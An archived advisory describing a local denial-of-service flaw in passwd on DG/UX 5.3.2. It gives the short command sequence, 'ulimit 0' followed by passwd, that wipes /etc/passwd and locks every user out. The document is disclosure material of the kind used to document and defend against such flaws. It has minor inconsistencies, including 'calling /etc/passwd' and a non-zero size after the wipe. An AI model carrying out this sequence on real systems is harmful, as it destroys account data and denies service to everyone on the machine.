TUCoPS :: Unix :: Various Flavours :: passwdgx.htm


TUCoPS :: Unix :: Various Flavours :: passwdgx.htm

DG/UX 5.3.2 attack zeroes out /etc/passwd file
Vulnerability
 passwd
Affected
 DG/UX 5.3.2
Description
 This denial of service attack zeros out the /etc/passwd file. It
 works like so:
 /~target> ls -la /etc/passwd
 -rw-rw-r-- root root 24 Feb 1995 /etc/passwd
 /~target> ulimit 0
 /~target> passwd
 Enter old password:
 Enter new password:
 /~target> ls -la /etc/passwd
 -rw-rw-r-- root root 11 June 01:34 /etc/passwd
 Calling ulimit 0 and then calling /etc/passwd will then set the
 passwd file to all zeros.
 Service is denied to everyone until the machine is booted up in
 single user mode and a copy of the passwd file is restored.

AltStyle によって変換されたページ (->オリジナル) /

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2025 AOH